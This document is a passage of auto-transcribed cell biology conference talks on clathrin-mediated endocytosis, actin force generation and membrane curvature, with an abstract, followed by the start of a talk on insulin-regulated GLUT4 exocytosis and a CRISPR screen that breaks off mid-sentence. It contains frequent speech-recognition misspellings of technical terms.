recruitment and dynamin recruitment, clathrin largely comes first, and there's a spike of dynamin and the two disappear together when a vesicle forms. Okay, so but what are the other sources of variation, maybe from one lab to another, one experiment to another? Different labs were looking at cell lines in mammalian cells from different species, different cell types, fibroblasts versus whatever liver cells. Almost all the cells that are studied in tissue culture have chromosome abnormalities because they're cancer cells and those cancer cells are in a cancerous state, they don't represent normal physiology. So we wanted to establish a robust system where we could study cell proteins at their endogenous level in as close to the normal physiological state as possible, and what we chose to do is to start studying cancer cells, and we used this cancer line from Bruce Conklin's lab at UCSF called WTC, it's an induced pluripotent stem cell, we've also used ES cells, and this is a karyotype of a helicelle, and you can see the chromosome numbers are quite aberrant, there are five copies of some chromosomes and three of others, there are massive translocations, and this I should note is a snapshot of a cell because these cancer cell lines are not stable, when you have this kind of karyotype it's constantly changing, this is a snapshot of a dynamic change, for one thing chromosome instability is a hallmark of cancer cells, whereas you can get stem cells that actually have a normal karyotype and normal physiology and by many indications are normal, and so we decided a few years ago to start doing all of our genome editing in stem cells, there are other advantages like you can take your stem cells and you can induce them into many different cell types, so now you can compare a process, a cellular process like endocytosis, in cells that are genetically identical, okay, the only difference is the epigenetics, you're differentiating them into different cell types, and at first we've concentrated on comparing the stem cells to fibroblasts and neuro-progenitors, so we've made a bank of genome-edited stem cells that we then differentiate into these different cell types, and it's really interesting because if you look my POSAC Daphne D'Ambrenet, if you look in the stem cells by EM, in a collaboration with Justin Tarasca, we see sort of large clathrin-coded vesicles, when we differentiate the fibroblasts we see these large structures that have been referred to as plaques that often seem to have vesicles emerging from their sides, and then neuro-progenitor cells have super-fast endocytosis in extremely regular, smaller vesicles, and so, and this, the EM level, ultra-structure, recapitulates very well what we see by the dynamics of looking in real time, and we've begun to dissect what's happening as cells differentiate, to differentiate this pathway and adapt it for these different cell types, and we think because it's an isogenic model, we now have a lot of control to do very well-controlled experiments and to really get to the source of these different phenotypes. The other thing that you can do with stem cells is to make organoids, okay, so again, if we want to get closer to physiology, and we heard about this yesterday from Tommy, and it was beautiful, Zebrafish studies, another, I think, complementary way is to make organoids, in this case, we're looking at an intestinal organoid, this is Daphne d'Ambrenet, she's French from Paris, and a collaborator in Dirk Hockmeyer's lab at Berkeley, Ryan Forster, who's helped us make organoids, and these epithelial cells have an apical surface, which happens to be in the lumen, and then this basolateral surface, and so, you know, in real cells, in tissues, there's stuff like cell-cell interactions, in polarity, where different activities are happening at different surfaces, and so, we think ideally what we want to do is to be able to watch these things in organoids, and Tommy already showed you that we also collaborated with the Betsig lab to start imaging these things, and I just wanted to mention, if you look at a volume like this, Tommy alluded to this too, one of the problems that is becoming really acute with these advanced microscopes, like the lattice light sheet with adaptive optics, is the amount of data that you can generate, and so, in this first frame here, we just did some simple segmentation, just looking at the nuclear volumes and starting to look at the membranes, and commercial software, you know, a file like this gets to be about two gigamites, which is the point at which you start overwhelming commercial software. One of our movies from our study with Eric Betsig, so Daphne spent just eight days at Janelia Farm, she generated 30 terabytes of data, and a typical movie like this one is 72 gigabytes, and so, it's hard to manipulate these kinds of images, and it's hard to do particle tracking, and so, we have a team now of people who are trying to catch up with Tommy, who can develop software for analyzing these things, so these three folks are all a student postdoc, an undergraduate computer science major, have all been improving our particle tracking software for 2D, and then Joe Schoenberg, who's a new data science fellow in the lab, has now got things working well in 3D, so we can start to look at these things, and, you know, this is a movie that compares different modes, and, you know, with the lattice light sheet, and you can see, with the adaptive optics, you can hopefully start to see, you can see the individual in the civic events, and start to quantify things in real time, and this was, this is part of a paper that Tommy and I are both authors on, that will be out in science sometime soon, with Eric Betzig's lab, so this is what we're called done in Betzig's lab, and Tommy actually showed this movie yesterday, so that's now with the adaptive optics, and this is with particle tracking from Tommy's lab. Okay, so, so with this project, you know, we're now making, we started with intestinal organoids, but there are a lot of people on my campus who are interested in making other things, and so Joe, just this data science fellow, is now making brain organoids with another lab, and I think the organoids are complementary to things like zebrafish, because you can make many different tissue types, you can create huge banks of stem cells, and there are now resources. One of the things that people in, say, the yeast or Drosophila field enjoy are shared resources of knockout collections, tag gene collections, and so on and so forth. The Allen Institute of Cell Science, which I'm also involved with, is making a big library now, using the same parent cell line as we are, with virtually every cell organelle, cytoskeletal structure, signaling protein, so on and so forth, tagged with GFP or RFP, and so all of these things can now be imaged using the lattice light sheet, for example, to look at whatever your process is, and then you can engineer in your favorite disease mutation, like we heard from Dr. Shen before me, I don't know how you say that, disease, but the awful skin disease, you could start to take these cells and differentiate them into karygocytes and look at these things. So I think this has a lot of promise. Back to Acton. Okay, so this is an old experiment that Marco and Edie Sun did in my lab some years ago. Again, this is a budding yeast cell, and these are these cortical patches, and when you look just in a wild type untreated budding yeast cell, in a chimer graph, you see these hook-like structures where the endosyc protein is present on the surface, and then at the end of its lifetime it curves into the cell when the membrane invaginates. In yeast, if you add an Acton inhibitor, latrunculin A, to the cells, you completely block this internalization. Okay, Acton is absolutely essential for generating that force. And so we want to use this as a system to study force generation, but we're now starting to look at this in mammalian cells. And so with our genome-edited cells, one question was whether Acton is really integral to the endosycin machinery in mammalian cells like it is in yeast cells, and so when we genome-edited the cells for, say, clathrin and Acton, we found that essentially every endosytic event in a mammalian cell involves a burst of Acton assembly. Again, it was eluded people for many years because it's transient, and it was really Christian Merrifield who found this originally that Acton, there's a burst of Acton assembly late in the endosyc pathway, but I think our work with these genome-edited cells added to that by showing that it's really something that happens at essentially every endosytic event. And so, and... I'm sorry, so what this experiment is, it's looking at Acton at endosytic sites. I'm sorry, so we've labeled Acton with RFP, and we've labeled Dynamin with GFP and showed that essentially every site, there's a burst of Acton assembly site. Yeah, thank you for slowing me down. So then using our genome-edited cells now where we think the events are more regular and it's easier to detect perturbations. So we've done a lot of sort of drug screens and RNAIs, and here, again, whether Acton was involved in endocytosis in mammalian cells and how important it was had been a question for many years, and a lot of inconsistent data in the field. As we titrated latrachelin, this Acton inhibitor, and looked... These are chymographs looking at the lifetimes of Dynamin we found in wild-type cells. It's very regular. In our cell, it's generally around 18 seconds of lifetime, but as you titrated more and more Acton inhibitor, the lifetime of the Dynamin got longer and longer, showing that that final step of vesicle formation is getting delayed and impaired in the absence of Acton. Okay, so now we want to think about how Acton might be working to help make endocytic vesicles. And so for quite some time, I've been collaborating... I started a collaboration on mathematical modeling with Georgia Oster in my department. Lately, Georgia's retired, and my collaboration's been handed off to Padmini Rangamani, who's now at the University of California, San Diego. And these two folks in my lab, a graduate student, Julian Hassinger and postdoc Matt Akamatsu, have been doing mathematical modeling. Julian has been doing continuum modeling and mat-agent-based modeling, and there's been sort of a nice synergy between the two of them. For Julian's work, he views the membrane as an elastic sheet and then starts to vary parameters to see how they affect the vesicle formation. So for example, he can vary the spontaneous curvature of these proteins that generate... that form the coat or the surface area of the coat, and he can show that he can form vesicles, but then over sort of a physiological range of membrane tensions, he finds that he can stall the endocytic process, and that depending on how much tension there is, it will stall either at this sort of U shape before the U to omega transition, or it can stall at a very early stage. And Julian went on to show in his paper that if you stall these events at higher membrane tension but still within a physiological range, and we've measured the membrane tensions with our colleague, Dan Fletcher, that you can add forces that might be provided by actin to push the pathway towards completion. Now it was very satisfying to us that these structures accumulated in the spalled cells because it fit well with work from... Mainly I think from Tommy's lab and from Sandy Schmidt's lab, and Tommy had this very nice study where he both varied membrane tension and looked in cells where there were natural differences in polarized epithelial cells. The apical surface has high membrane tension compared to the basolateral surface and found that you could with actin inhibitors inhibit endocytosis at the high tension apical surface, but that the basolateral surface was much less sensitive to actin inhibition. And basically the modeling work that Julian had done had fit very well with some of the experimental work from Tommy's lab and Sandy's lab, suggesting that actin was really required when you have high membrane tension. So then in Julian's model he varied where the actin forces might be acting, and in one scheme he had the actin sort of working like we think it works from our yeast studies by pulling the vesicle in, and he also had the actin generating the pinching force, and actually both of these could help drive the process towards completion. So Matt then started to use his agent-based modeling where he's looking at every single actin filament and individual molecules in this process, but in doing so we had a whole wealth of information from studies like those from Tom Pollard's about all the relevant physical properties and physical constants and levels for actin-cyloskeleton, but there were a few things we didn't have at endoscic sites. And so one of the things Matt did was built a really robust system for translating a fluorescent signal into a number of proteins. And I think this is something that I want to become part of our regular workflow in the lab is every time we get a fluorescent signal is to be able to immediately read out a number of proteins. And so what Matt did is he adopted a system developed by David Baker where he builds these synthetic nano cages. Well he designed, he engineers them, proteins that make nano cages of different numbers, 12, 24, 60, 120, and then puts GFP on them and then expresses these in cells. And so these individual punta each represent a certain number, a known number of GFP molecules and it makes a really nice standard curve over a range of numbers that's relevant for most of the numbers involved in endocytosis. And so we can use that for example to look at here, dynamin and the ARP2-3 complex, which nucleates actin, the diamonds in purple and the ARP2-3s in green, and we can count the number of ARP2-3s. And so now for Matt's modeling we know that there are about 150 ARP2-3 complexes and so on and so forth. So more numbers to add to this model. So Matt has built this model using Francois Nilek's cytosim program and he models the vesicle as this object hanging from a spring which is the plasmid membrane and then he puts in ARP2-3 complexes. He caps filaments, he does a sweep of parameter space so that we can explore sort of within a biologically reasonable range, these various parameters that are all known or that we've determined for his mathematical model. And the question is can he generate a system that self-organizes itself around an endocytic site and that generates sufficient force to overcome the highest membrane tension that we think occurs in a physiological context where endoscytic vesicles are forming. And so here he's plugging in numbers that he's either determined or that come from the literature and he's done these simulations and now he can generate a network in fact that self-organizes itself around this vesicle and generates sufficient force to pull and then to stick vesicle against this spring. So then from Matt's work we can generate this sort of self-organizing actin network, sort of the one we have now is more in this mode and then some of the conclusions I already mentioned he can generate about 15 piconewtons of force which we think is sufficient to overcome even very strong membrane tension. Can I ask a question? Yeah. Why is the nucleator in the bulk and not at the plus one? Okay, okay, I'm sorry, I'm going fast, I'm not explaining everything. There's two classes of proteins, the nucleators are blue and they are generally at the base on the membrane. In the budd... These purple proteins are coat associated actin filament binding proteins. Sorry, and that's an important... It's not a nucleator. So for example, there's a protein called HIP1R that binds to clathrin, it binds to PIP2 and it binds to actin filaments and it's a part of the coat. My former student, Osse, Ankvist Goldstein showed that. So the purple protein, thank you for asking that. The purple protein is a filament binding protein that captures filaments nucleated at the base. So in this model then, I said there are two modes in which Julian found actin could help to overcome the high membrane tension. And so we want to know what actin actually looks like at endosyx sites. Actin is really hard to see in the EM compared to say microtubules. But Tatjianosvitkina's lab has done, I think, the nicest study looking at actin around endosyx sites and what she does is she does platinum replica shadowing of unroofed cells and she sees something that looks much more like that first model where the actin is helping to pinch off the vesicle because the actin is concentrated around the base of the endosyx vesicle. Now this work is beautiful and I love it and I think it's showing you how some actin is organized but there are a couple problems with this kind of analysis. One it's EM and you can't look at a very large number of events. You can't vary parameters like membrane tension very easily just because there's so much work needed to generate these images and then also because these cells are unroofed. So they did, in order to get these kind of images they did something very violent to these cells. They ripped the top of the cell off and then they looked at what was left behind. So if part of the machinery that's associated with these endosyx sites is more tightly associated with what's being ripped off than what's left behind, it will be gone. So for us, for our modeling and for understanding this process, it's really important to understand how actin is organized. And so we decided to strike up a collaborator with my colleague, Kou Jou, in the chemistry department at Berkeley. And my postdoc, Charlotte, collaborated with Kou's postdoc, Sam Kenney, and generated by super resolution imaging, storm imaging, thousands and thousands of images of actin around clathrin sites. And Jou has come in and helped us to do some quantitative analysis of these images. But what's really interesting now is that we find basically two classes of structure. So clathrin is shown in red and actin is shown in teal or whatever that color is. And in many sites and in the majority of just normal growing cells, what we see is that the clathrin is higher than the actin. So the actin is around the base of the clathrin coated vesicle. This is exactly like what was seen in that EM study from Tatiana's FitKindes lab. However, we also see this other kind of figure where the clathrin is completely engulfed in actin. And I should tell you, for their data set, they use a surrogate timer to figure out where they are in the endocytic pathway, which is they used labeled dynamin. So dynamin appears very late in the pathway. So they only analyzed endocytic sites that had dynamin associated with them. And what they found is that normally the endocytic vesicle, the clathrin, is higher than the actin. And that's shown here because the blue is the height of the actin and the red. And I can tell you one of the things that's really cool about the super resolution imaging is it's done in x, y. But if you put this spherical lens in the path, you can actually generate z data. So this is actually a z projection from data that was collected in x, y, which I think is really cool. But anyway, that's an aside. So anyway, this is the height of the actin and the red is the height of the clathrin. Now if you do a transient osmotic treatment to raise the membrane tension, what you see is that you shift this distribution. So now the majority of the endocytic sites, the clathrin, is engulfed in actin. And so we think that the cell responds to high membrane tension by assembling more actin and actin with a different geometry. And it's interesting to think about what might be the tension sensor that's sensing the higher tension and whether it's a different nucleator that is nucleating the actin around the top of the clathrin pit as opposed to the bottom of the pit. And so this data is really, really rich. And we think we can do things now like look at class averages and actually get some more structural information from this. And we can look at other perturbations to the system. So in the last couple of minutes, I just wanted to tell you about one short little vignette about a project we've had. So a long time ago with George Oster, we shared a postdoc named Jin Liu who collaborated with my long time postdoc specialist, Yi Di Sun, and did a theory paper, which one of the notions in that paper, which is, I think, very commonly discussed now, but I think was a little less common then, was that there's a crosstalk between the geometry of the membrane and the biochemical reactions that are occurring throughout this endocytic process. You can think of endocytosis as a cascade of events where the curvature, the geometry, is constantly changing for the membrane, and that these geometries are being read back by the biochemical reactions. So for example, there are proteins that bind specifically to curved membranes, bar proteins, for example. And so if one of those proteins binds, if one of those protein binds, that will make the adjacent membrane have the ideal curvature, so more proteins can bind. And then also enzymes that act on the bilayer, if the bilayer is flat, they may have a hard time accessing bonds, but as it becomes curved, they could act more quickly and so on and so forth. So with this notion that there's crosstalk between the curvature and the biochemical reaction rates. So we liked that notion, but it just kind of sat there for a while. And thinking here's some words from George. George says that modeling can tell you how things might work. Modeling can also tell you how things cannot work, but modeling cannot tell you how things do work. For that, you need experiments. And so what we wanted was a way to experimentally test whether curvature was affecting this process. So we did some elegant studies here of pulling out tongues from GUVs. But we came up with another way to look at curvature in live cells, which was, I met this woman named Ben Xiaosui, who's a material scientist at Stanford University, and they make nano arrays, and we saw micro arrays in the previous talk. These are arrays that she makes by etching on a nano scale on quartz glass. And what happens is you can sit cells down on these nano arrays. You can also put supported bilayers on them. And the bottom of the cell actually tightly conforms to the curvature of the pillars, and you can dial in all sorts of curvatures. And then we have all these genome-edited cells, so we could put the cells on these substrates. This one happens to have bars, sometimes they're pillars. The bars are flat in the middle, and they have very high curvature at the ends. If you put our genome-edited cells on them, here's two of the bars, it turns out that the highly curved ends of the bars become hotspots. And this is now a chimograph, and you see clathrin, dynamin, clathrin, dynamin, clathrin, dynamin, so they're just streaming off vesicles on these highly curved sites. And so this is very exciting to us, you can see it actually happening in EM. Here's a cross-section of a pillar, there's an endosyct vesicle budding from the edge of the pillar. And the only problem with this system is that it was very hard to make these nano arrays. Fortunately, at Berkeley, we found that we have another way of making these, we now etch molds and then we use a polymer, and we can stamp out these nano arrays. So now this one happens to have ridges, and you can see, looking at the diamond, for example, that endosyct vesicles are coming from the crowns of these ridges. And so it's nice now, because we can make lots of these, and so now we can do things like RNAi screens and see if we've bypassed certain steps in the process. Our hypothesis is that there's some rate-limiting step where we have to generate initial curvature, and then you attract more curvature sensing proteins, and so on and so forth. And if you're interested in this, I just, some, I have some iBiology talks that were just posted online. So these are the people who did the work. I tried to mention everyone as we were going along, and I don't see anyone that I didn't mention. This is the lab. There's me, and I'm here, it's a joint lab with my wife, Georgian Barnes, who's here in the audience at the meeting. And I thank you very much for your attention. Okay, so thank you very much for the beautiful talk. We have a time for questions. What do you think determines the size of the vesicles? Is there much variability in the size of endosyct vesicles you can make, and what determines? So naturally what you mean? Naturally. Yeah, well, it's interesting. You know, when we differentiate these, so the stem cells actually have sort of a variable, and there's kind of a range, I'm going to say 80 to maybe up to 200 nanometers. Is that too big? Yeah, too big? A little smaller. Okay, but you know, in these neuroprogenitor cells, they're very, very regular and very small on the small end of that range. So you can vary them, and in fact, Tommy's done these beautiful studies with viral infections, showing how adaptable clathrin is. The coat can actually encase something quite large. But that's given by what is being taken. So naturally, do you mean? Naturally. And if you play with your membrane tension, do you change the size? Yeah, that's a good question. But Tommy says no, so I don't think that I haven't looked at the absolute number. So what makes sure that if they don't collapse? The clathrin self-assembles is a rigid molecule. It's rigid enough. It's a helium. As it builds, it puts hexagons and pentagons. So the overall curvature is defined by the ratio of hexagons against the pentagons. What exactly does that look like here? As David says, the neurons inside are smaller guys. The coated vesicles that you have in the secretory pathway in all cells, which are small. But you have huge, I was putting pressure inside this. No, no, no. The vesicles that are forming from internal vesicles inside the cell, the endosomes, they're all small guys. No, but at the plasma membrane. At the plasma membrane, we have never seen changes in the overall shape just by changing tension, right? What does it is a little bit of a cargo. So they adapt a little to the size of the cargo with an upper limit. We go beyond 100 nanometers. They stall. They get flat. We've also done mass spec to look at the differences in the clathrin-associated proteins in the three cell types that we've compared, the stem cells and neuroprogenitors and fibrolysis. We found some interesting differences and at least one of them, if we modulate it, we can change the geometry of the vesicles. AP2 actually. Have you looked at how a little bit of combination changes in your different differential itself? No, it's very interesting. No, we have not done that. We've done some nice probes available now. So we haven't done that. The young guy. The young guy. This might be a basic question, but why are those ridges hotspots for endocytosis? Yeah, that's what we're trying to figure out now. Our idea is that the curvature is a signal that's attracting. There's some limiting step where some initial curvature may help to recruit proteins. And so there are proteins that bind specifically to curved memories, like clathrin, for example, likes to make a cage. And so that by giving the cell curvature, you're attracting those proteins. And so we have a strategy. But we haven't been able to do many experiments because the quartz substrates we have take a day, they're made at Stanford. It takes a day to make each one at a cost of about $1,000. We can make about 15 of these in two hours now. So we're just in a place, it's taken us two years, but we're just in a place where we can stamp these things out and ask that kind of question. Maybe I can continue on this question. So now it's the novelty that you expected, the first coating which would be sensitive to that kind of curvature, which is a depth high, would be the F bar, right? So if you defeat F bar, you change the localization. That's, we're doing, we're setting up to do those experiments. Literally we've got these substrates, you know, we had to go through all these polymers to find things that weren't autofluorescent. We had to, my student learned the CAD programs and how to go, Lawrence Berkeley National Lab had to learn how to etch everything. So now he's, Bob, he's ready to go. So those are good questions, yeah. I'm going to continue on this. There's, in epithelial cells, you have all kinds of specializations, infoldings and brush borders and all those. And endocytosis is actually preferentially coming from the pit, from the curvature or not? I don't think so. I mean, I, you know, not in the, I think that it's possible the cell might exploit some natural fluctuations and trap a state. But you know, one of the things we're going to explore now is we're trying, we want to set up some kind of systematic study. I think you heard today on the micron scale about septins recognizing curvature and the clathrin pathway being influenced by curvature. We think there's probably a lot of other things that are happening in this other effect by curvature. So we want to use this system to look systematically at a lot of processes and see what else is responding. But I don't know, so in a natural setting, yeah, I don't, I don't have a comment on that. Otherwise there's something funny about this. At least in the fish we haven't seen that. Oh, that there's a preference for where they come from. Yeah. This must be a more question for you. I was wondering whether to think, or I'm thinking about whether force is the only way acting with active energy. Those are all that might be other mechanisms. For instance, I'm thinking of a paper by G2 Mayor and Udgar Johannes, a new state proposed that active plays a role in phase separation. Oh, yeah. And that would be important for the vision or many other ways. So we had a paper in E-Life this year where we actually proposed something like that, that this multivalent interactions make a phase separation to nucleate the actin. But there is your question also about whether actin is doing something else. In budding yeast, it's really clear that actin does something else, which is it sends back a negative signal to take everything apart, to turn off actin nucleation and to uncoat the vesicle. If you remember, I showed an image from yeast where we used this latrachelon A. And when you look at a coat protein like clathrin, when you block actin, it assembles on the surface and it just stays there, which normally it forms and turns over. And we've actually found a couple of the proteins, which may be yeast specific. I don't know, one is a protein kinase that phosphorylates an actor with the R2-3 complex and turns it off. Another is a synaptogenin, which binds to, it binds indirectly to actin to recruit it to facilitate the encoding step. So there the actin not only generates a force, but it also negatively feeds back on the processes that set up the site. So I was wondering about the type 1 myosins that are involved in yeast endocytosis. Do you know what they do there and are they also involved in mammalian cell endocytosis? Yeah, so there are type 1 myosins in mammalian endocytosis. In yeast, they are almost essential for the invagination step. And so I have a very good student, Ross Peterson, working on that process. And they're interesting proteins because they both nucleate, the one in yeast nucleates actin assembly and it has a motor domain. And we have a collaboration with Michael Ostap at Penn, who's a single molecule biophysicist. And we're characterizing the type 1 myosin in budding yeast. There are two kinds of myosin motor, you can roughly classify them. Some are tension sensitive clasps that when you pull on them, they just bind very tightly to actin and the others are force-generating motors. And so with the single molecule experiments, you can differentiate which type it is. We were, or at least I was really betting that we had a tension sensitive clasp that the myosin was actually holding everything together. But in fact, from the kinetic profiles, it looks much more like a force generator. And so budding yeast, according to the theoretician at Fred Chang collaborates with in fission yeast, says that the amount of pressure you need to make an endoscic vesicle in yeast, which grown in a tremendous turgor pressure, would be equivalent to pushing your finger into the tire of your car, so to put it in sort of real-world sense. So I think it may be more cute in mammalian cells, but we definitely, we've cloned it and tagged it and it's the same person doing the super resolution work is studying the myosin in my lab. We just got an inhibitor through the mail from someone in Germany of the type 1 myosin and we're trying to figure out what it does in mammalian cells. If there's time for one more, we can take coffee. There's this guy in the back who's been patient. David, this is probably philosophical. I mean, cop 1 and cop 2 vesicles are roughly the same size. They don't use actin. They don't use bar domain proteins. I mean, is this actin-driven process entirely due to perhaps the surface properties because there is so much of the cytoskeleton to begin with? Does it do with the tension? I mean, although Tommy says tension has no role. What? No, no, he said the opposite. He said the opposite. Tommy actually did a nice study, I think, to clarify the role. Is that it? Because the membranes are so tense that you need extra force to imagine it. I think that might be true, but actin is also used for some intracellular trafficking events. The AP1s, I think. Is it AP1 with the... The AP1 without actin doesn't work. I mean, basically, the liquid barrier is not tense. I'm talking about cop 2 and cop 1. But the liquid barrier is not tense, so the plus 1 has to be... Is that it? Is that it? It's not. It is not. You have a lot of excess area, so the plus 1 membrane is not tense, they say. But this guy says it is. But sometimes, but sometimes, there is some events that probably... You agree that the plus 1 membrane normal condition, the liquid barrier is not tense, right? So, in fact, if you follow up, I mean, one point I wanted to... You said that all the intracellular trafficking cults in Europe are recruiting actin, right? The events, well, 90% according to my... So, when we did the structure elimination, so there, we were looking a bit, right? The actin only appears in about 60% of the endosum. The pits, they don't have it. They are perfectly functional. They're coming in. How did you tag actin? Excuse me? I'm sorry, how are you looking at actin? What would you use for actin? I don't remember. But it was actin. I can't remember. It was... Go get it. I should go to... I should look at my own paper, right? Yes. Why is that important? I'm just kidding. I'm just kidding. I'm just kidding. We see 90 or so, 60, I don't know, but maybe... No, but there was a difference. The guys that had the actin were shorter lived and... Yeah, they were faster. Okay. There was no difference in the size of the pit. I see. But those were faster. The kinetic was faster. And the other one was faster. That was interesting. Yeah, yeah, yeah. Okay. Well, you know, in our latrunkulin titration, we saw it slowed the events. Yeah, but that's not the problem, though. When you do the latrunkling, you're disturbing the whole... Yes....stages of... We tried to look acutely, but now we've also... We actually get exactly the same thing with ARP 2-3 inhibitors. Yeah, yeah, yeah. Thank you for the discussion. Yeah, yeah, yeah. Thank you. Thank you for the coffee. Thanks. Yeah. Thank you. Enjoy. Thank you. Thank you.
|
Clathrin-mediated endocytosis (CME) is the best-studied pathway by which cells selectively internalize molecules from the plasma membrane and surrounding environment. We study this process by live-cell microscopy in yeast and mammalian cells. The yeast studies have revealed a regular sequence of events necessary for endocytic vesicle formation involving some 60 proteins, which induce a highly choreographed series of changes in membrane geometry, ultimately resulting in scission and vesicle release. To analyze endocytic dynamics in mammalian cells in which endogenous protein stoichiometry is preserved, we have used genome editing for the clathrin light chain A and dynamin-2 genomic loci and generated stem cells expressing fluorescent protein fusions from each locus. These cell lines are being used to study actin assembly at endocytic sites and tomake 3D organoids in culture. Use nano-patterned substrates, we are actively studying roles for membrane curvature in endocytic dynamics. At the same time, studies in yeast cells have recently focused on discovery of regulatory mechanisms for insuring theproper order and timing of events in the endocytic pathway and how actin assembly at endocytic sites is regulated. Studying the yeast and mammalian systems in parallel is allowing us to translate what is learned from one system to the other.
|
10.5446/50889 (DOI)
|
Okay, so I like to begin by thanking Nawa and other organizers for inviting me. It's my great pleasure to come here and to speak in this really fascinating meeting and also take a break from my teaching in Colorado. So now this diagram shows you a membrane protein on the cell surface. Now these proteins are the windows and the doors of the cell. Now these proteins include receptors, channels and transporters. And they allow the cell to communicate with the outside environment. Now as you can imagine, the surface levels of these proteins must be precisely controlled. Now too much of a protein or too little of a protein can often disrupt the physiological pathway associated with the protein. And in humans this may often cause diseases. So here I can give you one example, many of you already know. Now if you have two high levels activate EGR receptors on the cell surface. This is going to cause uncontrolled proliferation of the cells and this may cause cancer. Now on the other hand, if you have two low level or what we call transporter, as you're going to see in a moment, this is going to disrupt blood glucose homeostasis. And in humans this may cause type 2 diabetes. Now how is the surface level of proteins determined? Is it determined by the balance of exocytosis and the endocytosis? Now exocytosis is a vesicle fusion event, which involves the fusion of exocytic vesicle with a plasma membrane. And this delivers the cargo to the plasma membrane. Exocytosis on the other hand removes the cargo from the plasma membrane and returns it to the endocytic compartments. Now remarkably, both exocytosis and the endocytosis can be regulated by stimulus. And in this way, the surface level of a membrane protein can be adjusted acutely according to physiological demands. And here stimulus could be a secondary messenger. It could be a false relations. Now a major model system we have been using to study surface protein homeostasis is insulin controlled Glufor translocation. Now Glufor is quite an Euroglucal transporter because under the basal condition, Glufor is sequestered in intracellular compartments. So it's not on the plasma membrane. Now this is because your blood sugar level is normal and you don't need to uptake glucose. And at this basal stage, the exocytosis and the endocytosis is at equilibrium. So now imagine you have food. So your blood sugar goes up and this triggers insulin secretion from the pancreas, which then travel in the bloodstream and reach the target tissues, mostly adipocytes and the skeletal muscles. Now when insulin bind to the receptor on the plasma membrane, this activates insulin signaling cascade, which eventually leads to the activation of exocytosis. At the same time, the endocytosis is moderately reduced. The result is a translocation of Glufor protein from vesicle to the cell surface. And this translocation allows the transporter to uptake glucose into the cell, either burning into ATP or storage. Now this is your blood glucose level after you have food. That's at time zero is the time you have meal. Now you can see your blood glucose level quickly goes up, but also rapidly returns to the normal range. And this returning to the normal range is driven by insulin stimulates Glufor translocation. And when your blood glucose returns to the normal range, insulin signaling terminates and this also shuts down exocytosis. At the same time, endocytosis resumes and this leads to the retrieval of Glufor from cell surface and the returning them to the vesicles. Now you can see insulin control the surface level of Glufor transporters by regulating exocytosis and endocytosis. Now as much as we love Glufor exocytosis, the major goal we studied is to use as a paradigm to establish the general principles of surface protein homeostasis. For example, we expect our findings can be extended to understand the trafficking of neurotransmitter receptors in the neurons, the transport of water channels in the kidney epithelial cells and the trafficking of immune receptors in the immune system. Now today I'm going to tell you two stories on the regulation of surface protein homeostasis. I'm going to begin by a short story on the regulation of rap-GTPS by a protein called ribaf in exocytosis. Then I'm going to focus on a very recent finding on the regulation AP2 adapter formation by AA gap in the endocytosis. So I'll begin with exocytosis. Exocytosis, as I mentioned, is a vesicle fusion event. Now this is after RAB and Tether bring the vesicle and the target membrane together. And the vesicle fusion is driven by two classes of molecules, snares and the second one, monkeating SM protein. Now snares are membrane anchored proteins. And you have a vesicle anchored snare, kind of a v-snare, and the target anchored snare called the T-snares. When the v-snare and the T-snare see each other, they spontaneously assemble into a so-called transnare complex. And the transnare assembly proceeds toward the membrane. So you can imagine this is like a zaparin process, which forces the two membrane into a closed proximity to fuse. Now SM protein is a soluble protein. They combine to the transnare complex and accelerate the transnare assembly. Now snares and SM protein are the core engine for vesicle fusion. In addition to this core engine, Gloufor exocytosis also requires specialized regulatory factors, such as the synib, Thomason, and the Dr. B. Our previous work focused on biochemical dissection of these molecules. Since most of the work has already been published, here I'm not going into details. And from here I'd like to mention that this protein, I believe, only represents a minor fraction of the entire regulatory network for Gloufor exocytosis. Now the sequencing of the human genome predicted a large number of membrane proteins. And for the majority of these membrane proteins, we know virtually nothing. So therefore I think the most important direction in the field is to comprehensively identify new regulators for Gloufor exocytosis. Our quest coincided with the one that CRISPR-Cas9 genome editing. So we decided to perform unbiased genome-wide CRISPR screens. So we took advantage of existing genome-wide CRISPR libraries, but also we make our own customer CRISPR libraries. In these CRISPR libraries, so these are all lentil virus-based. You have a single-guided RA and also the Cas9. The single-guided RA recruits Cas9 protein to a specific location in the genome to introduce lots of function mutations. And the two perform screens we use HHA-GAP-Gloufor reporter. Now this reporter has HHA-epitope inserted into extracellular domain. Now HHA staining, as you can see here, can stain the surface of Gloufor reporters. On the other hand, the GAP tells you the total protein in the cell. Now if we calculate HHA staining and GAP staining, this will give you the information about a relative amount of our Gloufor reporter on the cell surface. And we start a stable cell line expressing this Gloufor reporter, and we mutagenize using the CRISPR-Cas9 library, and then we treat the cell with insulin. And then we use the flow cytometry to sort for the cells with the local for on the cell surface. And we repeat the process for three times. And then we took the sorted population and recovered the single-guided RA, and used the deep sequencing to analyze the abundance of the single-guided RA. Then we use the bioinformatic tools to calculate the significant hits. And finally, we performed secondary screens and individual validations. So we performed a screen in multiple cell lines. We start proof of concept screen in the cancer cell lines, but eventually we focused on my blast and the pre-adip sets. So very briefly, our screen identified a large number of single-guidars that were significantly enriched compared to the control population. So we then used this equation to calculate the abundance of the single-guidars so we can derive significant hits from the screens. While the screens identified a larger number of genes, the majority of the hits were not previously linked to Gloufor exocytosis. But we did recover non-regulators such as Rep10, exocytosis, and almost the entire insulin signaling cascade. So here I'm going to focus on one new factor identified in the screen called the RepF. Now RepF, Repinteracting Factor, it's a very small protein. It's a 14KD soluble protein. Now when I did a sequence analysis, the only prediction was it's a putative guanyin nucleotide exchange factor for Reps or GAP for Reps. Now now you're probably going to, well I think I remember you told me you didn't believe RepF was a GAP from the very beginning. But I have to say it's kind of ahead of the field because if you search literature and search the motifs, this is the only information you got. The entire protein is a RepGaF, of course a putative GAF. Now what's a GAF? RepGTP is involved in the viscose tailoring and the Rep is a G protein. And the Rep cycles between GTP and the GDP bond form. And the GTP bond form is active. And what GAF does is to promote GTP binding. So GAF is a positive regulator for Rep. Now the story of RepF began 25 years ago with two papers published by Peter Novick and the Pietro-Dicomediase groups. So their papers were mostly based on in-matrial biochemical acids. And actually RepF is also known as MS4 or DSS4. This is the first putative GAF for RepGTPs. Now think about that. There are about 70 RepGTPs in the human genome and this protein is the first putative GAF. But surprisingly that case later is a biologic function was still unknown. Next we use CRISPR-Case 9 knockout RepF in a deep sense. And in the wild type cell here you can see insulin strongly promote Gull 4 reporter translocation to the cell surface. So all these are flow cytometry based analysis. But in the RepF knockout cells you can see the translocation was largely abolished. And this confirms the screen data. Now these are exocytosis I say. If you look at the slope of the curve this represents the speed of exocytosis. And you can see here in 